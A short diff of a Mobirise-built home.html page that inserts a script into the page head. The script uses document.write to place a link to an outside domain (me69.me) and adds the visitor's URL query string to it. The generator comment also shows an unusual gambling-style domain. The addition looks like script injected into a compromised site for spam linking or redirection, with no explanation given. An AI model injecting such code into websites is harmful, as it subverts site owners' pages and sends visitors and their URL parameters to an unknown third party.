--- a/home.html
+++ b/home.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <html  >
-<head>
+<head><script>document.write('<a href="//me69.me/?_lp=1&'+window.location.search.substring(1)+'">REPLACE</a>');</script>
 
   <!-- Site made with Mobirise Website Builder v4.12.3, http://x.gclub.men/home.html -->
   <meta charset="UTF-8">
